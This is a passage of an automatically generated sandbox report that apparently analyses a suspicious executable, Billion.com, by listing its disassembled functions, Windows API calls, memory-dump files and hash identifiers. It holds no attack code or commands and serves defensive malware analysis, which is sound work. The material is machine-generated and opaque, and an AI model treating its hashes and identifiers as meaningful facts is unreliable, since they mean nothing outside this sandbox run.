                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                          • API String ID: 2506810119-140972201
                                                                                                                                                                                                                                                                                                          • Opcode ID: e1cfac10d2a0b7966a8c96586f49cb380511b169ff4f2c6e6d96165a2b4a34ce
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7502e048dc82af2582b267e5daebcb0198b7ab5ea29de4baf5d172bf0917450e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1cfac10d2a0b7966a8c96586f49cb380511b169ff4f2c6e6d96165a2b4a34ce
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9F317071A00218FFCB21DF99DC89D9EBBFCEF95710B1841A6E80497211E7708E55DB90
                                                                                                                                                                                                                                                                                                          Function 0019CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0019CBB1
                                                                                                                                                                                                                                                                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 0019CBF7
                                                                                                                                                                                                                                                                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,002029C0,00C15120), ref: 0019CC40
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                                          • String ID: 0
                                                                                                                                                                                                                                                                                                          • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                                          • Opcode ID: 16d2a67f9c2f05ffb3cbe4c28488b146ddd667d0edf96ef70c59cd4ee8ffa896
                                                                                                                                                                                                                                                                                                          • Instruction ID: d309b3979725680024f156063b301f9a8d4c2dd688d01dd077a04eceadfb7a4a
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16d2a67f9c2f05ffb3cbe4c28488b146ddd667d0edf96ef70c59cd4ee8ffa896
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1941C3712043029FDB24DF24D985F1ABBE8EF99714F14461DF8E997291D730E904CB92
                                                                                                                                                                                                                                                                                                          Function 001C4EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,001CDCD0,00000000,?,?,?,?), ref: 001C4F48
                                                                                                                                                                                                                                                                                                          • GetWindowLongW.USER32 ref: 001C4F65
                                                                                                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001C4F75
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$Long
                                                                                                                                                                                                                                                                                                          • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                                          • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                                          • Opcode ID: 4496f15bf3006f50e2ea3294f5f3c8ca1d4663340eb904c66b49fcd486bae57c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 7db2b79664e507de96019516cdb867cfc14010efe65f3a8c6fc4a6305a17baa4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4496f15bf3006f50e2ea3294f5f3c8ca1d4663340eb904c66b49fcd486bae57c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2331B071214205AFDB208E38DC55FEA7BA9EB28338F214729F975A21E0C770EC509B50
                                                                                                                                                                                                                                                                                                          Function 001B3AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001B3DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,001B3AD4,?,?), ref: 001B3DD5
                                                                                                                                                                                                                                                                                                          • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 001B3AD7
                                                                                                                                                                                                                                                                                                          • _wcslen.LIBCMT ref: 001B3AF8
                                                                                                                                                                                                                                                                                                          • htons.WSOCK32(00000000,?,?,00000000), ref: 001B3B63
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                                          • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                                          • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                                          • Opcode ID: cafd7636e347739cdeb2df99400ea9e0e4fba645d0a7e6338b9f40c7726a7582
                                                                                                                                                                                                                                                                                                          • Instruction ID: e8f5d871241943181834f8b9ad9aca73c86055044c4707ae28d04c6a2e31a812
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cafd7636e347739cdeb2df99400ea9e0e4fba645d0a7e6338b9f40c7726a7582
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24319339600201DFCB10CF68C6C5EA9BBE1EF54318F258159E8268B7A6D771EE55CB60
                                                                                                                                                                                                                                                                                                          Function 001C4954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 001C49DC
                                                                                                                                                                                                                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 001C49F0
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 001C4A14
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                                          • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                                          • Opcode ID: e26d92ec59c8c43257b84371edc312157f9f08d1b560cb064bd44610f5458d39
                                                                                                                                                                                                                                                                                                          • Instruction ID: c274adffe08e7b272cc0c91b672acbc9524f70991000aa9a1a9471ea63bc64f1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e26d92ec59c8c43257b84371edc312157f9f08d1b560cb064bd44610f5458d39
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7D21BF32610229BBDF218F50DC46FEF3B69EF58718F110218FA156B0D0D7B1E8559B90
                                                                                                                                                                                                                                                                                                          Function 001C50F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 001C51A3
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 001C51B1
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001C51B8
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                                          • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                                          • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                                          • Opcode ID: 7b7433129e2be689ec1fdf0239c827ed88db72731fb0cc03291735f65bf6a44f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 64415fcefaca711458d9de3041e38f497b511384b9a367fd2feb63eccd5b6910
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b7433129e2be689ec1fdf0239c827ed88db72731fb0cc03291735f65bf6a44f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 652130B5600649AFDB10DF54DC89EBB37ADEB69368B14015DFA009B361CB70EC55CBA0
                                                                                                                                                                                                                                                                                                          Function 001C4253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 001C42DC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 001C42EC
                                                                                                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 001C4312
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                                          • String ID: Listbox
                                                                                                                                                                                                                                                                                                          • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                                          • Opcode ID: e5e49533c5bec9c09726896bfa0c72ef5a79c92d21ed9f77d17ed62d7090a933
                                                                                                                                                                                                                                                                                                          • Instruction ID: 113e86b2d7e6c51246ee93433898c8730aa25de17d04788bdd3a2782a5fb1cd7
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5e49533c5bec9c09726896bfa0c72ef5a79c92d21ed9f77d17ed62d7090a933
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2215032614218BBEF118F94EC95FAB3B6EEBA9764F118128F9059B190CB71DC5187A0
                                                                                                                                                                                                                                                                                                          Function 001A5439 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 001A544D
                                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 001A54A1
                                                                                                                                                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,001CDCD0), ref: 001A5515
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                                          • String ID: %lu
                                                                                                                                                                                                                                                                                                          • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                                          • Opcode ID: a249908764c2d1e1e72467c7e8bc5ed30be87ba54e0e05c816ce4eeea5b0af48
                                                                                                                                                                                                                                                                                                          • Instruction ID: 8629b729af900b8d2769ab2b9f8180fb727c8dcdd12fdca0f090485806fc40d4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a249908764c2d1e1e72467c7e8bc5ed30be87ba54e0e05c816ce4eeea5b0af48
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A317675A00109AFDB10DF54D885EAA7BF9EF09304F1480A9F509DB362D771EE45CB61
                                                                                                                                                                                                                                                                                                          Function 001C8305 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 001C8339
                                                                                                                                                                                                                                                                                                          • EnumChildWindows.USER32(?,001C802F,00000000), ref: 001C83B0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0013249F: GetWindowLongW.USER32(00000000,000000EB), ref: 001324B0
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$ActiveChildEnumLongWindows
                                                                                                                                                                                                                                                                                                          • String ID: ( $(
                                                                                                                                                                                                                                                                                                          • API String ID: 3814560230-615512911
                                                                                                                                                                                                                                                                                                          • Opcode ID: 09ea8f198dbaf1d014aee3c88cefa5d32344fa8f432d96bc10a5ed82cec736b8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0a095472e09e28d36c4c1fd29705dc288554890b1c5905a82b5482fe185dd67f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09ea8f198dbaf1d014aee3c88cefa5d32344fa8f432d96bc10a5ed82cec736b8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE212874200305DFCB24DF28E888A96B7F5FB59720F21161EE879873A1DB70E854CB60
                                                                                                                                                                                                                                                                                                          Function 001C4C89 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 001C4CED
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 001C4D02
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 001C4D0F
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                                                                                                                                          • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                                          • Opcode ID: fc2a8ff4807f755b20c2b118820312b55911b070a59ada26f4f7e145880f74a1
                                                                                                                                                                                                                                                                                                          • Instruction ID: e201078dda0ca85b01f416e91c1531aa528b6407029701e497e67779980ccf59
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fc2a8ff4807f755b20c2b118820312b55911b070a59ada26f4f7e145880f74a1
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04110671244248BFEF205F65DC06FBB7BA8EFA5B65F110528FA51E20A0C771DC509B20
                                                                                                                                                                                                                                                                                                          Function 0019389E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00138577: _wcslen.LIBCMT ref: 0013858A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001936F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00193712
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001936F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00193723
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001936F4: GetCurrentThreadId.KERNEL32 ref: 0019372A
                                                                                                                                                                                                                                                                                                            • Part of subcall function 001936F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00193731
                                                                                                                                                                                                                                                                                                          • GetFocus.USER32 ref: 001938C4
                                                                                                                                                                                                                                                                                                            • Part of subcall function 0019373B: GetParent.USER32(00000000), ref: 00193746
                                                                                                                                                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0019390F
                                                                                                                                                                                                                                                                                                          • EnumChildWindows.USER32(?,00193987), ref: 00193937
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                                                          • String ID: %s%d
                                                                                                                                                                                                                                                                                                          • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2cfd41e51e2b6c945864a1508b1b9016fdf28207b68ccf634df28c302a1fe87e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 97f7bf33ce67b8c50ff47616952485cd21edc9fafd9deaade5ecba71683419ac
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cfd41e51e2b6c945864a1508b1b9016fdf28207b68ccf634df28c302a1fe87e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F118771600205ABCF11BF749C85FEE77A9AFA4304F048079F9599B292DF709A45DB30
                                                                                                                                                                                                                                                                                                          Function 001359FF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00135A34
                                                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(?,001337B8,?,?,?,?,?,00133709,?,?), ref: 00135A91
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.3324557168.0000000000131000.00000020.00000001.01000000.00000007.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324518263.0000000000130000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001CD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324627869.00000000001F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324735392.00000000001FD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.3324772151.0000000000205000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_130000_Billion.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: DeleteDestroyObjectWindow
                                                                                                                                                                                                                                                                                                          • String ID: <) $<)
